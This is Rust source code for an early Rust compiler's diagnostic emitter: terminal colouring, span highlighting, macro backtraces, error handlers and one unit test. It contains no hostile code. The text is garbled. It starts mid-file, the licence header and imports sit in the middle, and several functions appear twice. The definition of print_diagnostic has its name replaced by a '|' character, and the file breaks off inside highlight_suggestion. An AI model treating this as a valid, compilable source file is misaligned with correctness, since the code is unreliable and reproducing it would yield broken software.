fn stderr_isatty() -> bool {
unsafe { libc::isatty(libc::STDERR_FILENO) != 0 }
}
#[cfg(windows)]
fn stderr_isatty() -> bool {
const STD_ERROR_HANDLE: libc::DWORD = -12i32 as libc::DWORD;
extern "system" {
fn GetStdHandle(which: libc::DWORD) -> libc::HANDLE;
fn GetConsoleMode(hConsoleHandle: libc::HANDLE,
lpMode: libc::LPDWORD) -> libc::BOOL;
}
unsafe {
let handle = GetStdHandle(STD_ERROR_HANDLE);
let mut out = 0;
GetConsoleMode(handle, &mut out) != 0
}
}
impl Write for Destination {
fn write(&mut self, bytes: &[u8]) -> io::Result<usize> {
match *self {
Terminal(ref mut t) => t.write(bytes),
Raw(ref mut w) => w.write(bytes),
}
}
fn flush(&mut self) -> io::Result<()> {
match *self {
Terminal(ref mut t) => t.flush(),
Raw(ref mut w) => w.flush(),
}
}
}
impl Emitter for EmitterWriter {
fn emit(&mut self,
cmsp: Option<(&codemap::CodeMap, Span)>,
msg: &str, code: Option<&str>, lvl: Level) {
let error = match cmsp {
Some((cm, COMMAND_LINE_SP)) => emit(self, cm,
FileLine(COMMAND_LINE_SP),
msg, code, lvl),
Some((cm, sp)) => emit(self, cm, FullSpan(sp), msg, code, lvl),
None => print_diagnostic(self, "", lvl, msg, code),
};
match error {
Ok(()) => {}
Err(e) => panic!("failed to print diagnostics: {:?}", e),
}
}
fn custom_emit(&mut self, cm: &codemap::CodeMap,
sp: RenderSpan, msg: &str, lvl: Level) {
match emit(self, cm, sp, msg, None, lvl) {
Ok(()) => {}
Err(e) => panic!("failed to print diagnostics: {:?}", e),
}
}
}
fn emit(dst: &mut EmitterWriter, cm: &codemap::CodeMap, rsp: RenderSpan,
msg: &str, code: Option<&str>, lvl: Level) -> io::Result<()> {
let sp = rsp.span();
// We cannot check equality directly with COMMAND_LINE_SP
// since PartialEq is manually implemented to ignore the ExpnId
let ss = if sp.expn_id == COMMAND_LINE_EXPN {
"<command line option>".to_string()
} else if let EndSpan(_) = rsp {
let span_end = Span { lo: sp.hi, hi: sp.hi, expn_id: sp.expn_id};
cm.span_to_string(span_end)
} else {
cm.span_to_string(sp)
};
try!(print_diagnostic(dst, &ss[..], lvl, msg, code));
match rsp {
FullSpan(_) => {
try!(highlight_lines(dst, cm, sp, lvl, cm.span_to_lines(sp)));
try!(print_macro_backtrace(dst, cm, sp));
}
EndSpan(_) => {
try!(end_highlight_lines(dst, cm, sp, lvl, cm.span_to_lines(sp)));
try!(print_macro_backtrace(dst, cm, sp));
}
Suggestion(_, ref suggestion) => {
try!(highlight_suggestion(dst, cm, sp, suggestion));
try!(print_macro_backtrace(dst, cm, sp));
}
FileLine(..) => {
// no source text in this case!
}
}
match code {
Some(code) =>
match dst.registry.as_ref().and_then(|registry| registry.find_description(code)) {
Some(_) => {
try!(print_diagnostic(dst, &ss[..], Help,
&format!("run `rustc --explain {}` to see a detailed \
explanation", code), None));
}
None => ()
},
None => (),
}
Ok(())
}
/// Render a suggestion: print the span's lines with `suggestion`
/// spliced in place of the original code, without line numbers (but
/// leaving space for them so output lines up with the preceding snippet).
fn highlight_suggestion(err: &mut EmitterWriter,
                        cm: &codemap::CodeMap,
                        sp: Span,
                        suggestion: &str)
                        -> io::Result<()>
{
    let lines = cm.span_to_lines(sp).unwrap();
    assert!(!lines.lines.is_empty());
    // To build up the result, we want to take the snippet from the first
    // line that precedes the span, prepend that with the suggestion, and
    // then append the snippet from the last line that trails the span.
    let fm = &lines.file;
    let first_line = &lines.lines[0];
    let prefix = fm.get_line(first_line.line_index)
                   .map(|l| &l[..first_line.start_col.0])
                   .unwrap_or("");
    let last_line = lines.lines.last().unwrap();
    let suffix = fm.get_line(last_line.line_index)
                   .map(|l| &l[last_line.end_col.0..])
                   .unwrap_or("");
    let complete = format!("{}{}{}", prefix, suggestion, suffix);
    // print the suggestion without any line numbers, but leave
    // space for them. This helps with lining up with previous
    // snippets from the actual error being reported.
    let fm = &*lines.file;
    let mut lines = complete.lines();
    for (line, line_index) in lines.by_ref().take(MAX_LINES).zip(first_line.line_index..) {
        let elided_line_num = format!("{}", line_index+1);
        try!(write!(&mut err.dst, "{0}:{1:2$} {3}\n",
                    fm.name, "", elided_line_num.len(), line));
    }
    // if we elided some lines, add an ellipsis
    if lines.next().is_some() {
        let elided_line_num = format!("{}", first_line.line_index + MAX_LINES + 1);
        try!(write!(&mut err.dst, "{0:1$} {0:2$} ...\n",
                    "", fm.name.len(), elided_line_num.len()));
    }
    Ok(())
}
fn highlight_lines(err: &mut EmitterWriter,
cm: &codemap::CodeMap,
sp: Span,
lvl: Level,
lines: codemap::FileLinesResult)
-> io::Result<()>
{
let lines = match lines {
Ok(lines) => lines,
Err(_) => {
try!(write!(&mut err.dst, "(internal compiler error: unprintable span)\n"));
return Ok(());
}
};
let fm = &*lines.file;
let line_strings: Option<Vec<&str>> =
lines.lines.iter()
.map(|info| fm.get_line(info.line_index))
.collect();
let line_strings = match line_strings {
None => { return Ok(()); }
Some(line_strings) => line_strings
};
// Display only the first MAX_LINES lines.
let all_lines = lines.lines.len();
let display_lines = cmp::min(all_lines, MAX_LINES);
let display_line_infos = &lines.lines[..display_lines];
let display_line_strings = &line_strings[..display_lines];
// Calculate the widest number to format evenly and fix #11715
assert!(display_line_infos.len() > 0);
let mut max_line_num = display_line_infos[display_line_infos.len() - 1].line_index + 1;
let mut digits = 0;
while max_line_num > 0 {
max_line_num /= 10;
digits += 1;
}
// Print the offending lines
for (line_info, line) in display_line_infos.iter().zip(display_line_strings) {
try!(write!(&mut err.dst, "{}:{:>width$} {}\n",
fm.name,
line_info.line_index + 1,
line,
width=digits));
}
// If we elided something, put an ellipsis.
if display_lines < all_lines {
let last_line_index = display_line_infos.last().unwrap().line_index;
let s = format!("{}:{} ", fm.name, last_line_index + 1);
try!(write!(&mut err.dst, "{0:1$}...\n", "", s.len()));
}
// FIXME (#3260)
// If there's one line at fault we can easily point to the problem
if lines.lines.len() == 1 {
let lo = cm.lookup_char_pos(sp.lo);
let mut digits = 0;
let mut num = (lines.lines[0].line_index + 1) / 10;
// how many digits must be indent past?
while num > 0 { num /= 10; digits += 1; }
let mut s = String::new();
// Skip is the number of characters we need to skip because they are
// part of the 'filename:line ' part of the previous line.
let skip = fm.name.chars().count() + digits + 3;
for _ in 0..skip {
s.push(' ');
}
if let Some(orig) = fm.get_line(lines.lines[0].line_index) {
let mut col = skip;
let mut lastc = ' ';
let mut iter = orig.chars().enumerate();
for (pos, ch) in iter.by_ref() {
lastc = ch;
if pos >= lo.col.to_usize() { break; }
// Whenever a tab occurs on the previous line, we insert one on
// the error-point-squiggly-line as well (instead of a space).
// That way the squiggly line will usually appear in the correct
// position.
match ch {
'\t' => {
col += 8 - col%8;
s.push('\t');
},
_ => {
col += 1;
s.push(' ');
},
}
}
try!(write!(&mut err.dst, "{}", s));
let mut s = String::from("^");
let count = match lastc {
// Most terminals have a tab stop every eight columns by default
'\t' => 8 - col%8,
_ => 1,
};
col += count;
s.extend(::std::iter::repeat('~').take(count));
let hi = cm.lookup_char_pos(sp.hi);
if hi.col != lo.col {
for (pos, ch) in iter {
if pos >= hi.col.to_usize() { break; }
let count = match ch {
'\t' => 8 - col%8,
_ => 1,
};
col += count;
s.extend(::std::iter::repeat('~').take(count));
}
}
if s.len() > 1 {
// One extra squiggly is replaced by a "^"
s.pop();
}
try!(print_maybe_styled(err,
&format!("{}\n", s),
term::attr::ForegroundColor(lvl.color())));
}
}
Ok(())
}
/// Here are the differences between this and the normal `highlight_lines`:
/// `end_highlight_lines` will always put arrow on the last byte of the
/// span (instead of the first byte). Also, when the span is too long (more
/// than 6 lines), `end_highlight_lines` will print the first line, then
/// dot dot dot, then last line, whereas `highlight_lines` prints the first
/// six lines.
#[allow(deprecated)]
fn end_highlight_lines(w: &mut EmitterWriter,
                       cm: &codemap::CodeMap,
                       sp: Span,
                       lvl: Level,
                       lines: codemap::FileLinesResult)
                      -> io::Result<()> {
    // A span we cannot map back to source lines indicates a bug in the
    // compiler itself; report that and bail out without source context.
    let lines = match lines {
        Ok(lines) => lines,
        Err(_) => {
            try!(write!(&mut w.dst, "(internal compiler error: unprintable span)\n"));
            return Ok(());
        }
    };
    let fm = &*lines.file;
    let lines = &lines.lines[..];
    // Over-long spans: print only the first and last lines with "..." between.
    if lines.len() > MAX_LINES {
        if let Some(line) = fm.get_line(lines[0].line_index) {
            try!(write!(&mut w.dst, "{}:{} {}\n", fm.name,
                        lines[0].line_index + 1, line));
        }
        try!(write!(&mut w.dst, "...\n"));
        let last_line_index = lines[lines.len() - 1].line_index;
        if let Some(last_line) = fm.get_line(last_line_index) {
            try!(write!(&mut w.dst, "{}:{} {}\n", fm.name,
                        last_line_index + 1, last_line));
        }
    } else {
        // Short spans: print every line in the span.
        for line_info in lines {
            if let Some(line) = fm.get_line(line_info.line_index) {
                try!(write!(&mut w.dst, "{}:{} {}\n", fm.name,
                            line_info.line_index + 1, line));
            }
        }
    }
    // Build the caret line: pad past the "filename:linenum " prefix of the
    // last printed line, then pad out to the end column of the span.
    let last_line_start = format!("{}:{} ", fm.name, lines[lines.len()-1].line_index + 1);
    let hi = cm.lookup_char_pos(sp.hi);
    let skip = last_line_start.chars().count();
    let mut s = String::new();
    for _ in 0..skip {
        s.push(' ');
    }
    if let Some(orig) = fm.get_line(lines[0].line_index) {
        let iter = orig.chars().enumerate();
        for (pos, ch) in iter {
            // Span seems to use half-opened interval, so subtract 1
            // NOTE(review): this underflows if hi.col is 0 — relies on spans
            // never ending at column 0; confirm against span construction.
            if pos >= hi.col.to_usize() - 1 { break; }
            // Whenever a tab occurs on the previous line, we insert one on
            // the error-point-squiggly-line as well (instead of a space).
            // That way the squiggly line will usually appear in the correct
            // position.
            match ch {
                '\t' => s.push('\t'),
                _ => s.push(' '),
            }
        }
    }
    s.push('^');
    s.push('\n');
    print_maybe_styled(w,
                       &s[..],
                       term::attr::ForegroundColor(lvl.color()))
}
/// Prints a pair of notes ("in expansion of ..." / "expansion site") for the
/// macro expansion that produced `sp`, then recurses on the call site so the
/// entire expansion chain is reported, innermost expansion first.
fn print_macro_backtrace(w: &mut EmitterWriter,
                         cm: &codemap::CodeMap,
                         sp: Span)
                         -> io::Result<()> {
    let cs = try!(cm.with_expn_info(sp.expn_id, |expn_info| -> io::Result<_> {
        match expn_info {
            Some(ei) => {
                // Span of the macro's definition, if it is known.
                let ss = ei.callee.span.map_or(String::new(),
                                               |span| cm.span_to_string(span));
                // Decorate the macro name according to the expansion flavor:
                // attribute (`#[name]`), bang macro (`name!`), or an internal
                // compiler expansion (no decoration).
                let (pre, post) = match ei.callee.format {
                    codemap::MacroAttribute => ("#[", "]"),
                    codemap::MacroBang => ("", "!"),
                    codemap::CompilerExpansion => ("", ""),
                };
                try!(print_diagnostic(w, &ss, Note,
                                      &format!("in expansion of {}{}{}",
                                              pre,
                                              ei.callee.name,
                                              post),
                                      None));
                let ss = cm.span_to_string(ei.call_site);
                try!(print_diagnostic(w, &ss, Note, "expansion site", None));
                // Return the call site so the caller can walk outward.
                Ok(Some(ei.call_site))
            }
            None => Ok(None)
        }
    }));
    // Recurse until we reach a span with no expansion info.
    cs.map_or(Ok(()), |call_site| print_macro_backtrace(w, cm, call_site))
}
/// Unwraps `opt`, reporting an internal compiler error through `diag` when it
/// is `None`. The message closure is only evaluated on the failure path.
pub fn expect<T, M>(diag: &SpanHandler, opt: Option<T>, msg: M) -> T where
    M: FnOnce() -> String,
{
    // `bug` diverges (`-> !`), so the closure coerces to `T`.
    opt.unwrap_or_else(|| diag.handler().bug(&msg()))
}
#[cfg(test)]
mod test {
    use super::{EmitterWriter, highlight_lines, Level};
    use codemap::{mk_sp, CodeMap, BytePos};
    use std::sync::{Arc, Mutex};
    use std::io::{self, Write};
    use std::str::from_utf8;
    // Diagnostic doesn't align properly in span where line number increases by one digit
    #[test]
    fn test_hilight_suggestion_issue_11715() {
        // In-memory sink so the rendered diagnostic can be inspected after
        // the call.
        struct Sink(Arc<Mutex<Vec<u8>>>);
        impl Write for Sink {
            fn write(&mut self, data: &[u8]) -> io::Result<usize> {
                Write::write(&mut *self.0.lock().unwrap(), data)
            }
            // Restored body (this line was mangled by an extraction
            // artifact): nothing is buffered locally, so flush is a no-op.
            fn flush(&mut self) -> io::Result<()> { Ok(()) }
        }
        let data = Arc::new(Mutex::new(Vec::new()));
        let mut ew = EmitterWriter::new(Box::new(Sink(data.clone())), None);
        let cm = CodeMap::new();
        let content = "abcdefg
        koksi
        line3
        line4
        cinq
        line6
        line7
        line8
        line9
        line10
        e-lä-vän
        tolv
        dreizehn
        ";
        let file = cm.new_filemap("dummy.txt".to_string(), content.to_string());
        for (i, b) in content.bytes().enumerate() {
            if b == b'\n' {
                file.next_line(BytePos(i as u32));
            }
        }
        // Span from line 8 through line 12 (1-based): crosses the 9 -> 10
        // digit-width boundary, which is exactly what issue #11715 is about.
        let start = file.lines.borrow()[7];
        let end = file.lines.borrow()[11];
        let sp = mk_sp(start, end);
        let lvl = Level::Error;
        println!("span_to_lines");
        let lines = cm.span_to_lines(sp);
        println!("highlight_lines");
        highlight_lines(&mut ew, &cm, sp, lvl, lines).unwrap();
        println!("done");
        let vec = data.lock().unwrap().clone();
        let vec: &[u8] = &vec;
        println!("{}", from_utf8(vec).unwrap());
        assert_eq!(vec, "dummy.txt: 8 \n\
                         dummy.txt: 9 \n\
                         dummy.txt:10 \n\
                         dummy.txt:11 \n\
                         dummy.txt:12 \n".as_bytes());
    }
}
// Copyright 2012 The Rust Project Developers. See the COPYRIGHT
// file at the top-level directory of this distribution and at
// http://rust-lang.org/COPYRIGHT.
//
// Licensed under the Apache License, Version 2.0 <LICENSE-APACHE or
// http://www.apache.org/licenses/LICENSE-2.0> or the MIT license
// <LICENSE-MIT or http://opensource.org/licenses/MIT>, at your
// option. This file may not be copied, modified, or distributed
// except according to those terms.
pub use self::Level::*;
pub use self::RenderSpan::*;
pub use self::ColorConfig::*;
use self::Destination::*;
use codemap::{self, COMMAND_LINE_SP, COMMAND_LINE_EXPN, Pos, Span};
use diagnostics;
use std::cell::{RefCell, Cell};
use std::{cmp, error, fmt};
use std::io::prelude::*;
use std::io;
use term::{self, WriterWrapper};
use libc;
/// maximum number of lines we will print for each error; arbitrary.
const MAX_LINES: usize = 6;
#[derive(Clone)]
pub enum RenderSpan {
/// A FullSpan renders with both with an initial line for the
/// message, prefixed by file:linenum, followed by a summary of
/// the source code covered by the span.
FullSpan(Span),
/// Similar to a FullSpan, but the cited position is the end of
/// the span, instead of the start. Used, at least, for telling
/// compiletest/runtest to look at the last line of the span
/// (since `end_highlight_lines` displays an arrow to the end
/// of the span).
EndSpan(Span),
/// A suggestion renders with both with an initial line for the
/// message, prefixed by file:linenum, followed by a summary
/// of hypothetical source code, where the `String` is spliced
/// into the lines in place of the code covered by the span.
Suggestion(Span, String),
/// A FileLine renders with just a line for the message prefixed
/// by file:linenum.
FileLine(Span),
}
impl RenderSpan {
fn span(&self) -> Span {
match *self {
FullSpan(s) |
Suggestion(s, _) |
EndSpan(s) |
FileLine(s) =>
s
}
}
}
#[derive(Clone, Copy)]
pub enum ColorConfig {
Auto,
Always,
Never
}
pub trait Emitter {
fn emit(&mut self, cmsp: Option<(&codemap::CodeMap, Span)>,
msg: &str, code: Option<&str>, lvl: Level);
fn custom_emit(&mut self, cm: &codemap::CodeMap,
sp: RenderSpan, msg: &str, lvl: Level);
}
/// Used as a return value to signify a fatal error occurred. (It is also
/// used as the argument to panic at the moment, but that will eventually
/// not be true.)
#[derive(Copy, Clone, Debug)]
#[must_use]
pub struct FatalError;
impl fmt::Display for FatalError {
fn fmt(&self, f: &mut fmt::Formatter) -> Result<(), fmt::Error> {
write!(f, "parser fatal error")
}
}
impl error::Error for FatalError {
fn description(&self) -> &str {
"The parser has encountered a fatal error"
}
}
/// Signifies that the compiler died with an explicit call to `.bug`
/// or `.span_bug` rather than a failed assertion, etc.
#[derive(Copy, Clone, Debug)]
pub struct ExplicitBug;
impl fmt::Display for ExplicitBug {
fn fmt(&self, f: &mut fmt::Formatter) -> Result<(), fmt::Error> {
write!(f, "parser internal bug")
}
}
impl error::Error for ExplicitBug {
fn description(&self) -> &str {
"The parser has encountered an internal bug"
}
}
/// A span-handler is like a handler but also
/// accepts span information for source-location
/// reporting.
pub struct SpanHandler {
pub handler: Handler,
pub cm: codemap::CodeMap,
}
impl SpanHandler {
pub fn new(handler: Handler, cm: codemap::CodeMap) -> SpanHandler {
SpanHandler {
handler: handler,
cm: cm,
}
}
pub fn span_fatal(&self, sp: Span, msg: &str) -> FatalError {
self.handler.emit(Some((&self.cm, sp)), msg, Fatal);
return FatalError;
}
pub fn span_fatal_with_code(&self, sp: Span, msg: &str, code: &str) -> FatalError {
self.handler.emit_with_code(Some((&self.cm, sp)), msg, code, Fatal);
return FatalError;
}
pub fn span_err(&self, sp: Span, msg: &str) {
self.handler.emit(Some((&self.cm, sp)), msg, Error);
self.handler.bump_err_count();
}
pub fn span_err_with_code(&self, sp: Span, msg: &str, code: &str) {
self.handler.emit_with_code(Some((&self.cm, sp)), msg, code, Error);
self.handler.bump_err_count();
}
pub fn span_warn(&self, sp: Span, msg: &str) {
self.handler.emit(Some((&self.cm, sp)), msg, Warning);
}
pub fn span_warn_with_code(&self, sp: Span, msg: &str, code: &str) {
self.handler.emit_with_code(Some((&self.cm, sp)), msg, code, Warning);
}
pub fn span_note(&self, sp: Span, msg: &str) {
self.handler.emit(Some((&self.cm, sp)), msg, Note);
}
pub fn span_end_note(&self, sp: Span, msg: &str) {
self.handler.custom_emit(&self.cm, EndSpan(sp), msg, Note);
}
pub fn span_help(&self, sp: Span, msg: &str) {
self.handler.emit(Some((&self.cm, sp)), msg, Help);
}
/// Prints out a message with a suggested edit of the code.
///
/// See `diagnostic::RenderSpan::Suggestion` for more information.
pub fn span_suggestion(&self, sp: Span, msg: &str, suggestion: String) {
self.handler.custom_emit(&self.cm, Suggestion(sp, suggestion), msg, Help);
}
pub fn fileline_note(&self, sp: Span, msg: &str) {
self.handler.custom_emit(&self.cm, FileLine(sp), msg, Note);
}
pub fn fileline_help(&self, sp: Span, msg: &str) {
self.handler.custom_emit(&self.cm, FileLine(sp), msg, Help);
}
pub fn span_bug(&self, sp: Span, msg: &str) -> ! {
self.handler.emit(Some((&self.cm, sp)), msg, Bug);
panic!(ExplicitBug);
}
pub fn span_unimpl(&self, sp: Span, msg: &str) -> ! {
self.span_bug(sp, &format!("unimplemented {}", msg));
}
pub fn handler<'a>(&'a self) -> &'a Handler {
&self.handler
}
}
/// A handler deals with errors; certain errors
/// (fatal, bug, unimpl) may cause immediate exit,
/// others log errors for later reporting.
pub struct Handler {
err_count: Cell<usize>,
emit: RefCell<Box<Emitter + Send>>,
pub can_emit_warnings: bool
}
impl Handler {
pub fn new(color_config: ColorConfig,
registry: Option<diagnostics::registry::Registry>,
can_emit_warnings: bool) -> Handler {
let emitter = Box::new(EmitterWriter::stderr(color_config, registry));
Handler::with_emitter(can_emit_warnings, emitter)
}
pub fn with_emitter(can_emit_warnings: bool, e: Box<Emitter + Send>) -> Handler {
Handler {
err_count: Cell::new(0),
emit: RefCell::new(e),
can_emit_warnings: can_emit_warnings
}
}
pub fn fatal(&self, msg: &str) -> ! {
self.emit.borrow_mut().emit(None, msg, None, Fatal);
panic!(FatalError);
}
pub fn err(&self, msg: &str) {
self.emit.borrow_mut().emit(None, msg, None, Error);
self.bump_err_count();
}
pub fn bump_err_count(&self) {
self.err_count.set(self.err_count.get() + 1);
}
pub fn err_count(&self) -> usize {
self.err_count.get()
}
pub fn has_errors(&self) -> bool {
self.err_count.get() > 0
}
pub fn abort_if_errors(&self) {
let s;
match self.err_count.get() {
0 => return,
1 => s = "aborting due to previous error".to_string(),
_ => {
s = format!("aborting due to {} previous errors",
self.err_count.get());
}
}
self.fatal(&s[..]);
}
pub fn warn(&self, msg: &str) {
self.emit.borrow_mut().emit(None, msg, None, Warning);
}
pub fn note(&self, msg: &str) {
self.emit.borrow_mut().emit(None, msg, None, Note);
}
pub fn help(&self, msg: &str) {
self.emit.borrow_mut().emit(None, msg, None, Help);
}
pub fn bug(&self, msg: &str) -> ! {
self.emit.borrow_mut().emit(None, msg, None, Bug);
panic!(ExplicitBug);
}
pub fn unimpl(&self, msg: &str) -> ! {
self.bug(&format!("unimplemented {}", msg));
}
pub fn emit(&self,
cmsp: Option<(&codemap::CodeMap, Span)>,
msg: &str,
lvl: Level) {
if lvl == Warning && !self.can_emit_warnings { return }
self.emit.borrow_mut().emit(cmsp, msg, None, lvl);
}
pub fn emit_with_code(&self,
cmsp: Option<(&codemap::CodeMap, Span)>,
msg: &str,
code: &str,
lvl: Level) {
if lvl == Warning && !self.can_emit_warnings { return }
self.emit.borrow_mut().emit(cmsp, msg, Some(code), lvl);
}
pub fn custom_emit(&self, cm: &codemap::CodeMap,
sp: RenderSpan, msg: &str, lvl: Level) {
if lvl == Warning && !self.can_emit_warnings { return }
self.emit.borrow_mut().custom_emit(cm, sp, msg, lvl);
}
}
/// Severity of a diagnostic, from internal compiler errors down to hints.
#[derive(Copy, PartialEq, Clone, Debug)]
pub enum Level {
    Bug,      // internal compiler error; the compiler itself is at fault
    Fatal,    // unrecoverable error; compilation stops immediately
    Error,    // ordinary error; counted, aborts after the current phase
    Warning,  // suppressible via `can_emit_warnings`
    Note,     // supplementary information attached to another diagnostic
    Help,     // suggestion for how to fix the problem
}
impl fmt::Display for Level {
fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result {
use std::fmt::Display;
match *self {
Bug => "error: internal compiler error".fmt(f),
Fatal | Error => "error".fmt(f),
Warning => "warning".fmt(f),
Note => "note".fmt(f),
Help => "help".fmt(f),
}
}
}
impl Level {
fn color(self) -> term::color::Color {
match self {
Bug | Fatal | Error => term::color::BRIGHT_RED,
Warning => term::color::BRIGHT_YELLOW,
Note => term::color::BRIGHT_GREEN,
Help => term::color::BRIGHT_CYAN,
}
}
}
/// Writes `msg` to `w`, applying `color` when the destination is an actual
/// terminal and falling back to unstyled output for raw writers.
fn print_maybe_styled(w: &mut EmitterWriter,
                      msg: &str,
                      color: term::attr::Attr) -> io::Result<()> {
    match w.dst {
        Terminal(ref mut t) => {
            try!(t.attr(color));
            // If `msg` ends in a newline, we need to reset the color before
            // the newline. We're making the assumption that we end up writing
            // to a `LineBufferedWriter`, which means that emitting the reset
            // after the newline ends up buffering the reset until we print
            // another line or exit. Buffering the reset is a problem if we're
            // sharing the terminal with any other programs (e.g. other rustc
            // instances via `make -jN`).
            //
            // Note that if `msg` contains any internal newlines, this will
            // result in the `LineBufferedWriter` flushing twice instead of
            // once, which still leaves the opportunity for interleaved output
            // to be miscolored. We assume this is rare enough that we don't
            // have to worry about it.
            if msg.ends_with("\n") {
                try!(t.write_all(msg[..msg.len()-1].as_bytes()));
                try!(t.reset());
                try!(t.write_all(b"\n"));
            } else {
                try!(t.write_all(msg.as_bytes()));
                try!(t.reset());
            }
            Ok(())
        }
        // Raw destinations (files, pipes) get the plain bytes.
        Raw(ref mut w) => w.write_all(msg.as_bytes()),
    }
}
fn | (dst: &mut EmitterWriter, topic: &str, lvl: Level,
msg: &str, code: Option<&str>) -> io::Result<()> {
if !topic.is_empty() {
try!(write!(&mut dst.dst, "{} ", topic));
}
try!(print_maybe_styled(dst,
&format!("{}: ", lvl.to_string()),
term::attr::ForegroundColor(lvl.color())));
try!(print_maybe_styled(dst,
&format!("{}", msg),
term::attr::Bold));
match code {
Some(code) => {
let style = term::attr::ForegroundColor(term::color::BRIGHT_MAGENTA);
try!(print_maybe_styled(dst, &format!(" [{}]", code.clone()), style));
}
None => ()
}
try!(write!(&mut dst.dst, "\n"));
Ok(())
}
/// Default `Emitter` implementation: renders diagnostics to a terminal
/// (with color) or to an arbitrary raw writer.
pub struct EmitterWriter {
    dst: Destination,                                  // where output is written
    registry: Option<diagnostics::registry::Registry>  // known error codes, used for `--explain` hints
}
/// Output target for an `EmitterWriter`: either a color-capable terminal
/// or a plain byte sink.
enum Destination {
    Terminal(Box<term::Terminal<WriterWrapper> + Send>),
    Raw(Box<Write + Send>),
}
impl EmitterWriter {
    /// Builds an emitter targeting stderr, enabling color per
    /// `color_config` (`Auto` checks whether stderr is a tty).
    pub fn stderr(color_config: ColorConfig,
                  registry: Option<diagnostics::registry::Registry>) -> EmitterWriter {
        let stderr = io::stderr();
        let use_color = match color_config {
            Always => true,
            Never => false,
            Auto => stderr_isatty(),
        };
        if use_color {
            // `term::stderr()` can fail (e.g. unknown TERM); fall back to
            // uncolored raw output in that case.
            let dst = match term::stderr() {
                Some(t) => Terminal(t),
                None => Raw(Box::new(stderr)),
            };
            EmitterWriter { dst: dst, registry: registry }
        } else {
            EmitterWriter { dst: Raw(Box::new(stderr)), registry: registry }
        }
    }
    /// Builds an emitter writing uncolored output to an arbitrary sink
    /// (used by tests and tools that capture diagnostics).
    pub fn new(dst: Box<Write + Send>,
               registry: Option<diagnostics::registry::Registry>) -> EmitterWriter {
        EmitterWriter { dst: Raw(dst), registry: registry }
    }
}
/// Returns true when stderr is attached to a terminal (Unix: `isatty(2)`).
#[cfg(unix)]
fn stderr_isatty() -> bool {
    unsafe { libc::isatty(libc::STDERR_FILENO) != 0 }
}
/// Returns true when stderr is attached to a console (Windows:
/// `GetConsoleMode` succeeds only for real console handles, so its return
/// value doubles as a tty check).
#[cfg(windows)]
fn stderr_isatty() -> bool {
    const STD_ERROR_HANDLE: libc::DWORD = -12i32 as libc::DWORD;
    extern "system" {
        fn GetStdHandle(which: libc::DWORD) -> libc::HANDLE;
        fn GetConsoleMode(hConsoleHandle: libc::HANDLE,
                          lpMode: libc::LPDWORD) -> libc::BOOL;
    }
    unsafe {
        let handle = GetStdHandle(STD_ERROR_HANDLE);
        let mut out = 0;
        GetConsoleMode(handle, &mut out) != 0
    }
}
/// Forwards `Write` calls to whichever concrete sink the destination wraps.
impl Write for Destination {
    fn write(&mut self, bytes: &[u8]) -> io::Result<usize> {
        match *self {
            Terminal(ref mut t) => t.write(bytes),
            Raw(ref mut w) => w.write(bytes),
        }
    }
    fn flush(&mut self) -> io::Result<()> {
        match *self {
            Terminal(ref mut t) => t.flush(),
            Raw(ref mut w) => w.flush(),
        }
    }
}
impl Emitter for EmitterWriter {
    /// Emits a diagnostic; command-line spans render as a bare file-line,
    /// real spans render with full source context, span-less diagnostics
    /// print just the header line.
    fn emit(&mut self,
            cmsp: Option<(&codemap::CodeMap, Span)>,
            msg: &str, code: Option<&str>, lvl: Level) {
        let error = match cmsp {
            Some((cm, COMMAND_LINE_SP)) => emit(self, cm,
                                                FileLine(COMMAND_LINE_SP),
                                                msg, code, lvl),
            Some((cm, sp)) => emit(self, cm, FullSpan(sp), msg, code, lvl),
            None => print_diagnostic(self, "", lvl, msg, code),
        };
        // Failing to print a diagnostic is itself unrecoverable.
        match error {
            Ok(()) => {}
            Err(e) => panic!("failed to print diagnostics: {:?}", e),
        }
    }
    /// Emits a diagnostic with an explicit, caller-chosen render style.
    fn custom_emit(&mut self, cm: &codemap::CodeMap,
                   sp: RenderSpan, msg: &str, lvl: Level) {
        match emit(self, cm, sp, msg, None, lvl) {
            Ok(()) => {}
            Err(e) => panic!("failed to print diagnostics: {:?}", e),
        }
    }
}
/// Core rendering routine: prints the header line, then the source snippet
/// appropriate to the `RenderSpan` flavor, then the macro backtrace, and
/// finally an `--explain` hint when the error code has a registered
/// long-form description.
fn emit(dst: &mut EmitterWriter, cm: &codemap::CodeMap, rsp: RenderSpan,
        msg: &str, code: Option<&str>, lvl: Level) -> io::Result<()> {
    let sp = rsp.span();
    // We cannot check equality directly with COMMAND_LINE_SP
    // since PartialEq is manually implemented to ignore the ExpnId
    let ss = if sp.expn_id == COMMAND_LINE_EXPN {
        "<command line option>".to_string()
    } else if let EndSpan(_) = rsp {
        // EndSpan headers point at the end of the span, not its start.
        let span_end = Span { lo: sp.hi, hi: sp.hi, expn_id: sp.expn_id};
        cm.span_to_string(span_end)
    } else {
        cm.span_to_string(sp)
    };
    try!(print_diagnostic(dst, &ss[..], lvl, msg, code));
    match rsp {
        FullSpan(_) => {
            try!(highlight_lines(dst, cm, sp, lvl, cm.span_to_lines(sp)));
            try!(print_macro_backtrace(dst, cm, sp));
        }
        EndSpan(_) => {
            try!(end_highlight_lines(dst, cm, sp, lvl, cm.span_to_lines(sp)));
            try!(print_macro_backtrace(dst, cm, sp));
        }
        Suggestion(_, ref suggestion) => {
            try!(highlight_suggestion(dst, cm, sp, suggestion));
            try!(print_macro_backtrace(dst, cm, sp));
        }
        FileLine(..) => {
            // no source text in this case!
        }
    }
    // Offer `rustc --explain E…` only for codes the registry knows about.
    match code {
        Some(code) =>
            match dst.registry.as_ref().and_then(|registry| registry.find_description(code)) {
                Some(_) => {
                    try!(print_diagnostic(dst, &ss[..], Help,
                                          &format!("run `rustc --explain {}` to see a detailed \
                                                   explanation", code), None));
                }
                None => ()
            },
        None => (),
    }
    Ok(())
}
/// Renders a suggested replacement: splices `suggestion` into the source in
/// place of the span and prints up to MAX_LINES of the hypothetical result,
/// leaving blank space where the line numbers would normally go so the
/// output lines up with the preceding snippet.
fn highlight_suggestion(err: &mut EmitterWriter,
                        cm: &codemap::CodeMap,
                        sp: Span,
                        suggestion: &str)
                        -> io::Result<()>
{
    let lines = cm.span_to_lines(sp).unwrap();
    assert!(!lines.lines.is_empty());
    // To build up the result, we want to take the snippet from the first
    // line that precedes the span, prepend that with the suggestion, and
    // then append the snippet from the last line that trails the span.
    let fm = &lines.file;
    let first_line = &lines.lines[0];
    // NOTE(review): `start_col.0` / `end_col.0` are byte offsets — slicing
    // assumes the span boundaries fall on char boundaries.
